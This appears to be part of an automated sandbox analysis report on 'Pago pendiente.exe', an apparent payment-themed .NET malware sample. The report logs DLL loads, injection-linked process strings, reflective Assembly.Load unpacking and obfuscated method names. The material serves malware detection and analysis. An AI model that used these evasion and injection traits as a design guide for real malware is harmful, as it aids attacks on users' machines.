          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\Pago pendiente.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Pago pendiente.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Pago pendiente.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: RegSvcs.pdb, source: explorer.exe, 00000006.00000002.4459657953.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000007.00000002.4444528823.0000000004CFF000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000007.00000002.4443405031.000000000282B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: RegSvcs.exe, 00000005.00000002.2072131724.0000000000FA7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2072038092.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, control.exe, control.exe, 00000007.00000002.4443192720.0000000000060000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000007.00000003.2075562332.00000000045FF000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000007.00000003.2072079557.000000000444B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000007.00000003.2075562332.00000000045FF000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000007.00000003.2072079557.000000000444B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdbUGP source: RegSvcs.exe, 00000005.00000002.2072131724.0000000000FA7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2072038092.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, control.exe, 00000007.00000002.4443192720.0000000000060000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: RegSvcs.pdb source: explorer.exe, 00000006.00000002.4459657953.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000007.00000002.4444528823.0000000004CFF000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000007.00000002.4443405031.000000000282B000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: Pago pendiente.exe, Form1.cs.Net Code: InitializeComponent
          Source: 0.2.Pago pendiente.exe.7700000.11.raw.unpack, HomeView.cs.Net Code: System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Pago pendiente.exe.32f8498.5.raw.unpack, HomeView.cs.Net Code: System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, GDVHnCd8e4hct1HQKy.cs.Net Code: nM5Y8yY844OV97SlUkr System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, GDVHnCd8e4hct1HQKy.cs.Net Code: nM5Y8yY844OV97SlUkr System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, GDVHnCd8e4hct1HQKy.cs.Net Code: nM5Y8yY844OV97SlUkr System.Reflection.Assembly.Load(byte[])
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_077261E5 pushad ; retf 0_2_077261E6
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_077261EF pushad ; retf 0_2_077261F0
          Source: C:\Users\user\Desktop\Pago pendiente.exeCode function: 0_2_07A545D4 push ebp; retf 0_2_07A545D5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00417024 push ecx; iretd 5_2_00417025
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_004170C2 push edx; ret 5_2_004170CA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_004073EB push ebp; ret 5_2_004073EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00416CC8 push D1939A9Fh; retf 5_2_00416CCD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041D4B5 push eax; ret 5_2_0041D508
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041D56C push eax; ret 5_2_0041D572
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041D502 push eax; ret 5_2_0041D508
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0041D50B push eax; ret 5_2_0041D572
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_014309AD push ecx; mov dword ptr [esp], ecx5_2_014309B6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0140135E push eax; iretd 5_2_01401369
          Source: C:\Windows\explorer.exeCode function: 6_2_0E4D1B02 push esp; retn 0000h6_2_0E4D1B03
          Source: C:\Windows\explorer.exeCode function: 6_2_0E4D1B1E push esp; retn 0000h6_2_0E4D1B1F
          Source: C:\Windows\explorer.exeCode function: 6_2_0E4D19B5 push esp; retn 0000h6_2_0E4D1AE7
          Source: C:\Windows\explorer.exeCode function: 6_2_101CF9B5 push esp; retn 0000h6_2_101CFAE7
          Source: C:\Windows\explorer.exeCode function: 6_2_101CFB1E push esp; retn 0000h6_2_101CFB1F
          Source: C:\Windows\explorer.exeCode function: 6_2_101CFB02 push esp; retn 0000h6_2_101CFB03
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0006486D push ecx; ret 7_2_00064880
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B27FA pushad ; ret 7_2_047B27F9
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B225F pushad ; ret 7_2_047B27F9
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B283D push eax; iretd 7_2_047B2858
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047E09AD push ecx; mov dword ptr [esp], ecx7_2_047E09B6
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_025A73EB push ebp; ret 7_2_025A73EC
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_025B7024 push ecx; iretd 7_2_025B7025
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_025B70C2 push edx; ret 7_2_025B70CA
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_025BD4B5 push eax; ret 7_2_025BD508
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_025BD56C push eax; ret 7_2_025BD572
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_025BD50B push eax; ret 7_2_025BD572
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_025BD502 push eax; ret 7_2_025BD508
          Source: Pago pendiente.exeStatic PE information: section name: .text entropy: 7.9402587845762955
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, p9IUFAmHiMdrlKeUBu.csHigh entropy of concatenated method names: 'ptJbMH6R4K', 'eeXbuRFTuS', 'KOrbG4TY6Y', 'dpSb96egsG', 'sUYbJ1a2cO', 'SM3bDBJv5Z', 'Ui0b6YTyr8', 'PQW7Q3wFcG', 'TbL7iDSMqG', 'CAS7j6pI8J'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, rMMxMYJxa9lPbCugfv.csHigh entropy of concatenated method names: 'Dispose', 'JOfMjer7K7', 'WVRY20O88F', 'eMveeCcEUB', 'frRMmCKFRR', 'idgMzItJqD', 'ProcessDialogKey', 'IyAYLx00SK', 'ynAYMybQBX', 'aSHYY09IUF'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, Ye8cD83ilgP4Q1dM8q.csHigh entropy of concatenated method names: 'r7ccAysw1i', 's2ockC5LHL', 'LKPcTAIniD', 'BYAc2ITeqN', 'RWRcnnxrfl', 'c2ycU56NTS', 'sL4cg6YBFM', 'qpLcW54Wsc', 'T7lcPhWTmD', 'T9ScCVDb94'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, IQKgXNAjhiaS4o0dDr.csHigh entropy of concatenated method names: 'yBrJKZ4sdF', 'aHMJljN128', 'SkkJtE58EK', 'rH0JyBnhWo', 'FqxJh5MKZI', 'VfGJvxZTcy', 'pPYJQlQ7hO', 'I8NJidQ8w0', 'eLEJjFS28b', 'bPLJmAND8K'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, GDVHnCd8e4hct1HQKy.csHigh entropy of concatenated method names: 'RcEu8Gup93', 'jDhu9V47tw', 'nNduJMVobt', 'rLnuriQ63y', 'VGsuDPnL0K', 'tVMu6VYJLB', 'A5KuotME0x', 'G01uds6eG6', 'QuDuF8TjKr', 'WisuORrG7Q'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, AXKOa9YvYah2ILJNRV.csHigh entropy of concatenated method names: 'rydSsc1G5', 'VUPXxX8LA', 'Qfl5ewpkV', 'QkERYAgBA', 'on2kEUkGZ', 'z1WN4QuSw', 'N175s9bHombUWO9Oth', 'ATc4RvVGSuVbIix8lM', 'IXN7PXEZJ', 'rdSVRMTAQ'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, AHoIF0TeuJQfgUnWf4.csHigh entropy of concatenated method names: 'irZ68JCcTg', 'YWl6JUY4OV', 'GwP6DIM2FB', 'Dam6o7pwZv', 'S1G6dO7QKA', 'dJADhHqHw1', 'a6iDv8SqWs', 'CfWDQgDPG1', 'JotDie8pdE', 'O5QDjLSd8E'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, HPe8TuMuoArV3iWmnaG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uIjVKOptQe', 'yKPVlv5DUh', 'PdgVtCh4ke', 'kwAVyFJLPP', 'hkuVhtg9Dm', 'VKlVveExIS', 'PflVQp4i6h'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, hUIdvJzp3hSwOD6Knr.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'l4ubcMiwUK', 'VfBbB32Zwu', 'cufb0fWrSy', 'kVlbpgBB4b', 'jmIb7voSKk', 'euhbbS27jo', 'QQAbVYep01'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, cyZmYlkmRq3rAqHw2h.csHigh entropy of concatenated method names: 'TZUrX95S8N', 'Ohhr5rP6rX', 'aiBrA62GJb', 'hVSrkgyt31', 'txSrBSkhAt', 'TNgr0393Xf', 'SbGrpEGVto', 'brxr7JeAuD', 'NlVrbvaEZb', 'RxDrVXFGx6'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, Cv3u2mMLqgVyop0G1AN.csHigh entropy of concatenated method names: 'QE9bwYLlcx', 'lFYbx8ZWHq', 'QECbSXGNq7', 'up9bXaaXRy', 'L2Jbf5gSnI', 'i26b5MNxtF', 'IPEbRZ6nZg', 'feLbAFLIyZ', 'SX2bkZB8WM', 'vZGbNpl7X9'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, M4qQq4G1UrG1lP8ZE3.csHigh entropy of concatenated method names: 'yqnMoQKgXN', 'YhiMdaS4o0', 'RmRMOq3rAq', 'Kw2M4hTpd1', 'rlcMBQyXHo', 'NF0M0euJQf', 'zDSt40cPsStBkEWNhs', 'YbGCJpH1L1Lx4m0ik3', 'i9WMMlK87V', 'X5FMuNCWaF'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, Fpd1sFNOxY2GMblcQy.csHigh entropy of concatenated method names: 'sTBDfZihnL', 'USEDRBxAHj', 'RhIreDRDPG', 'LaIrnBLx6j', 'bOWrUEnLaP', 'CYarHfEKWu', 'na5rgoqaWL', 'chgrW8aZPo', 'snGrILIsl5', 'cuhrPnjlWJ'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, x7wBW7KwVdGRUhw4G0.csHigh entropy of concatenated method names: 'BHmBPRL8nw', 'RpIBZ01ddK', 'IWQBK0QRp2', 'lW7BlGBUe4', 'KPFB2sJggf', 'VcRBeUCbxU', 'J6cBnFqXgA', 'DTYBUbFk0k', 'HW9BHgoWbE', 'gZYBgvhG4A'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, gRCKFRiRDdgItJqDny.csHigh entropy of concatenated method names: 'R2Q796ZjJ0', 'nGH7J1RSiL', 'cWo7rjppKl', 'M4n7D9PpUl', 'qY076f68Vm', 'Q5S7oPrHjm', 'SFy7djiqUW', 'DpX7Fsi2CQ', 'hO97OPJ947', 'sky74VCD4G'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, cX4ZgRg3HpJweDXnri.csHigh entropy of concatenated method names: 'uvOo9Flv6v', 'C59or7autg', 'pu2o6nkMlY', 'yyK6m3kqSR', 'TAJ6zgUuBZ', 'hXfoLttTSi', 'eXxoM62lBt', 'hAOoYkeKgm', 'SdGou63t9e', 'w0MoGvcpUM'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, G3nNu1yLLZWCVb0s4T.csHigh entropy of concatenated method names: 'I0epOVONQy', 'U5wp42Kpdw', 'ToString', 'Gkgp9AVYmT', 'bdypJPZiGi', 'WWFprCO0mW', 'ecVpDSJPS1', 'MTrp6kLwKR', 'jhipoLFcxT', 'QxapdnyfIX'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, Dx00SKjxnAybQBXMSH.csHigh entropy of concatenated method names: 'K0n7TAD3YQ', 'jBa72rbjiR', 'BeB7eVO3Pj', 'AxG7n4qmbF', 'uLp7Kdq7Fk', 'z2g7UnZ9Eq', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, Mj6eLHr9Gfok1X3SWR.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'gsRYjndp2q', 'R5bYmWxL1B', 'g9gYzAOCnp', 'CtEuLqr905', 'We3uM0cMgf', 'ExiuY7YWrV', 'iCLuuAajeV', 'wQR1QxYiF46ddfUAkNL'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, JiUYX5IaJZrrF9fpAJ.csHigh entropy of concatenated method names: 'RyKowX41g1', 'zU0oxhhmtr', 'wq2oSV2sd3', 'NvQoXbyikM', 'FbHof9mDFB', 'ALWo5TqOAw', 'CohoRBr8Fh', 'tjJoAaNnKp', 'MQrokDwjcJ', 'qoRoN9tfQ7'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, FmJaeetirRTGV3GUfA.csHigh entropy of concatenated method names: 'ToString', 'bq60ClfX1X', 'psn02UaZq6', 'VHO0e9q9o6', 'fFJ0nbCFsR', 'xjd0U58dlC', 'sAZ0HDeoAe', 'sox0g7Bv8w', 'NF40WmuXuD', 'ePd0Is7qtL'
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, ifpL5MvflcOluxXgWa.csHigh entropy of concatenated method names: 'cV7piNaiMo', 'BxepmnLu6c', 'yjq7L0FqN2', 'GlD7MGNJvi', 'gbxpCDRT9N', 'qKOpZaCMop', 'rPPp31NpuZ', 'Nx1pKOH96S', 'bSJplEqxLd', 'FqWptCqVYD'
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, p9IUFAmHiMdrlKeUBu.csHigh entropy of concatenated method names: 'ptJbMH6R4K', 'eeXbuRFTuS', 'KOrbG4TY6Y', 'dpSb96egsG', 'sUYbJ1a2cO', 'SM3bDBJv5Z', 'Ui0b6YTyr8', 'PQW7Q3wFcG', 'TbL7iDSMqG', 'CAS7j6pI8J'
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, rMMxMYJxa9lPbCugfv.csHigh entropy of concatenated method names: 'Dispose', 'JOfMjer7K7', 'WVRY20O88F', 'eMveeCcEUB', 'frRMmCKFRR', 'idgMzItJqD', 'ProcessDialogKey', 'IyAYLx00SK', 'ynAYMybQBX', 'aSHYY09IUF'
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, Ye8cD83ilgP4Q1dM8q.csHigh entropy of concatenated method names: 'r7ccAysw1i', 's2ockC5LHL', 'LKPcTAIniD', 'BYAc2ITeqN', 'RWRcnnxrfl', 'c2ycU56NTS', 'sL4cg6YBFM', 'qpLcW54Wsc', 'T7lcPhWTmD', 'T9ScCVDb94'
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, IQKgXNAjhiaS4o0dDr.csHigh entropy of concatenated method names: 'yBrJKZ4sdF', 'aHMJljN128', 'SkkJtE58EK', 'rH0JyBnhWo', 'FqxJh5MKZI', 'VfGJvxZTcy', 'pPYJQlQ7hO', 'I8NJidQ8w0', 'eLEJjFS28b', 'bPLJmAND8K'
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, GDVHnCd8e4hct1HQKy.csHigh entropy of concatenated method names: 'RcEu8Gup93', 'jDhu9V47tw', 'nNduJMVobt', 'rLnuriQ63y', 'VGsuDPnL0K', 'tVMu6VYJLB', 'A5KuotME0x', 'G01uds6eG6', 'QuDuF8TjKr', 'WisuORrG7Q'
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, AXKOa9YvYah2ILJNRV.csHigh entropy of concatenated method names: 'rydSsc1G5', 'VUPXxX8LA', 'Qfl5ewpkV', 'QkERYAgBA', 'on2kEUkGZ', 'z1WN4QuSw', 'N175s9bHombUWO9Oth', 'ATc4RvVGSuVbIix8lM', 'IXN7PXEZJ', 'rdSVRMTAQ'
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, AHoIF0TeuJQfgUnWf4.csHigh entropy of concatenated method names: 'irZ68JCcTg', 'YWl6JUY4OV', 'GwP6DIM2FB', 'Dam6o7pwZv', 'S1G6dO7QKA', 'dJADhHqHw1', 'a6iDv8SqWs', 'CfWDQgDPG1', 'JotDie8pdE', 'O5QDjLSd8E'
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, HPe8TuMuoArV3iWmnaG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uIjVKOptQe', 'yKPVlv5DUh', 'PdgVtCh4ke', 'kwAVyFJLPP', 'hkuVhtg9Dm', 'VKlVveExIS', 'PflVQp4i6h'
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, hUIdvJzp3hSwOD6Knr.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'l4ubcMiwUK', 'VfBbB32Zwu', 'cufb0fWrSy', 'kVlbpgBB4b', 'jmIb7voSKk', 'euhbbS27jo', 'QQAbVYep01'
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, cyZmYlkmRq3rAqHw2h.csHigh entropy of concatenated method names: 'TZUrX95S8N', 'Ohhr5rP6rX', 'aiBrA62GJb', 'hVSrkgyt31', 'txSrBSkhAt', 'TNgr0393Xf', 'SbGrpEGVto', 'brxr7JeAuD', 'NlVrbvaEZb', 'RxDrVXFGx6'
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, Cv3u2mMLqgVyop0G1AN.csHigh entropy of concatenated method names: 'QE9bwYLlcx', 'lFYbx8ZWHq', 'QECbSXGNq7', 'up9bXaaXRy', 'L2Jbf5gSnI', 'i26b5MNxtF', 'IPEbRZ6nZg', 'feLbAFLIyZ', 'SX2bkZB8WM', 'vZGbNpl7X9'
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, M4qQq4G1UrG1lP8ZE3.csHigh entropy of concatenated method names: 'yqnMoQKgXN', 'YhiMdaS4o0', 'RmRMOq3rAq', 'Kw2M4hTpd1', 'rlcMBQyXHo', 'NF0M0euJQf', 'zDSt40cPsStBkEWNhs', 'YbGCJpH1L1Lx4m0ik3', 'i9WMMlK87V', 'X5FMuNCWaF'
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, Fpd1sFNOxY2GMblcQy.csHigh entropy of concatenated method names: 'sTBDfZihnL', 'USEDRBxAHj', 'RhIreDRDPG', 'LaIrnBLx6j', 'bOWrUEnLaP', 'CYarHfEKWu', 'na5rgoqaWL', 'chgrW8aZPo', 'snGrILIsl5', 'cuhrPnjlWJ'
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, x7wBW7KwVdGRUhw4G0.csHigh entropy of concatenated method names: 'BHmBPRL8nw', 'RpIBZ01ddK', 'IWQBK0QRp2', 'lW7BlGBUe4', 'KPFB2sJggf', 'VcRBeUCbxU', 'J6cBnFqXgA', 'DTYBUbFk0k', 'HW9BHgoWbE', 'gZYBgvhG4A'
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, gRCKFRiRDdgItJqDny.csHigh entropy of concatenated method names: 'R2Q796ZjJ0', 'nGH7J1RSiL', 'cWo7rjppKl', 'M4n7D9PpUl', 'qY076f68Vm', 'Q5S7oPrHjm', 'SFy7djiqUW', 'DpX7Fsi2CQ', 'hO97OPJ947', 'sky74VCD4G'
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, cX4ZgRg3HpJweDXnri.csHigh entropy of concatenated method names: 'uvOo9Flv6v', 'C59or7autg', 'pu2o6nkMlY', 'yyK6m3kqSR', 'TAJ6zgUuBZ', 'hXfoLttTSi', 'eXxoM62lBt', 'hAOoYkeKgm', 'SdGou63t9e', 'w0MoGvcpUM'
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, G3nNu1yLLZWCVb0s4T.csHigh entropy of concatenated method names: 'I0epOVONQy', 'U5wp42Kpdw', 'ToString', 'Gkgp9AVYmT', 'bdypJPZiGi', 'WWFprCO0mW', 'ecVpDSJPS1', 'MTrp6kLwKR', 'jhipoLFcxT', 'QxapdnyfIX'
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, Dx00SKjxnAybQBXMSH.csHigh entropy of concatenated method names: 'K0n7TAD3YQ', 'jBa72rbjiR', 'BeB7eVO3Pj', 'AxG7n4qmbF', 'uLp7Kdq7Fk', 'z2g7UnZ9Eq', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, Mj6eLHr9Gfok1X3SWR.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'gsRYjndp2q', 'R5bYmWxL1B', 'g9gYzAOCnp', 'CtEuLqr905', 'We3uM0cMgf', 'ExiuY7YWrV', 'iCLuuAajeV', 'wQR1QxYiF46ddfUAkNL'
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, JiUYX5IaJZrrF9fpAJ.csHigh entropy of concatenated method names: 'RyKowX41g1', 'zU0oxhhmtr', 'wq2oSV2sd3', 'NvQoXbyikM', 'FbHof9mDFB', 'ALWo5TqOAw', 'CohoRBr8Fh', 'tjJoAaNnKp', 'MQrokDwjcJ', 'qoRoN9tfQ7'
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, FmJaeetirRTGV3GUfA.csHigh entropy of concatenated method names: 'ToString', 'bq60ClfX1X', 'psn02UaZq6', 'VHO0e9q9o6', 'fFJ0nbCFsR', 'xjd0U58dlC', 'sAZ0HDeoAe', 'sox0g7Bv8w', 'NF40WmuXuD', 'ePd0Is7qtL'
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, ifpL5MvflcOluxXgWa.csHigh entropy of concatenated method names: 'cV7piNaiMo', 'BxepmnLu6c', 'yjq7L0FqN2', 'GlD7MGNJvi', 'gbxpCDRT9N', 'qKOpZaCMop', 'rPPp31NpuZ', 'Nx1pKOH96S', 'bSJplEqxLd', 'FqWptCqVYD'
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, p9IUFAmHiMdrlKeUBu.csHigh entropy of concatenated method names: 'ptJbMH6R4K', 'eeXbuRFTuS', 'KOrbG4TY6Y', 'dpSb96egsG', 'sUYbJ1a2cO', 'SM3bDBJv5Z', 'Ui0b6YTyr8', 'PQW7Q3wFcG', 'TbL7iDSMqG', 'CAS7j6pI8J'
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, rMMxMYJxa9lPbCugfv.csHigh entropy of concatenated method names: 'Dispose', 'JOfMjer7K7', 'WVRY20O88F', 'eMveeCcEUB', 'frRMmCKFRR', 'idgMzItJqD', 'ProcessDialogKey', 'IyAYLx00SK', 'ynAYMybQBX', 'aSHYY09IUF'
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, Ye8cD83ilgP4Q1dM8q.csHigh entropy of concatenated method names: 'r7ccAysw1i', 's2ockC5LHL', 'LKPcTAIniD', 'BYAc2ITeqN', 'RWRcnnxrfl', 'c2ycU56NTS', 'sL4cg6YBFM', 'qpLcW54Wsc', 'T7lcPhWTmD', 'T9ScCVDb94'
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, IQKgXNAjhiaS4o0dDr.csHigh entropy of concatenated method names: 'yBrJKZ4sdF', 'aHMJljN128', 'SkkJtE58EK', 'rH0JyBnhWo', 'FqxJh5MKZI', 'VfGJvxZTcy', 'pPYJQlQ7hO', 'I8NJidQ8w0', 'eLEJjFS28b', 'bPLJmAND8K'
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, GDVHnCd8e4hct1HQKy.csHigh entropy of concatenated method names: 'RcEu8Gup93', 'jDhu9V47tw', 'nNduJMVobt', 'rLnuriQ63y', 'VGsuDPnL0K', 'tVMu6VYJLB', 'A5KuotME0x', 'G01uds6eG6', 'QuDuF8TjKr', 'WisuORrG7Q'
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, AXKOa9YvYah2ILJNRV.csHigh entropy of concatenated method names: 'rydSsc1G5', 'VUPXxX8LA', 'Qfl5ewpkV', 'QkERYAgBA', 'on2kEUkGZ', 'z1WN4QuSw', 'N175s9bHombUWO9Oth', 'ATc4RvVGSuVbIix8lM', 'IXN7PXEZJ', 'rdSVRMTAQ'
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, AHoIF0TeuJQfgUnWf4.csHigh entropy of concatenated method names: 'irZ68JCcTg', 'YWl6JUY4OV', 'GwP6DIM2FB', 'Dam6o7pwZv', 'S1G6dO7QKA', 'dJADhHqHw1', 'a6iDv8SqWs', 'CfWDQgDPG1', 'JotDie8pdE', 'O5QDjLSd8E'
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, HPe8TuMuoArV3iWmnaG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uIjVKOptQe', 'yKPVlv5DUh', 'PdgVtCh4ke', 'kwAVyFJLPP', 'hkuVhtg9Dm', 'VKlVveExIS', 'PflVQp4i6h'
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, hUIdvJzp3hSwOD6Knr.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'l4ubcMiwUK', 'VfBbB32Zwu', 'cufb0fWrSy', 'kVlbpgBB4b', 'jmIb7voSKk', 'euhbbS27jo', 'QQAbVYep01'
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, cyZmYlkmRq3rAqHw2h.csHigh entropy of concatenated method names: 'TZUrX95S8N', 'Ohhr5rP6rX', 'aiBrA62GJb', 'hVSrkgyt31', 'txSrBSkhAt', 'TNgr0393Xf', 'SbGrpEGVto', 'brxr7JeAuD', 'NlVrbvaEZb', 'RxDrVXFGx6'
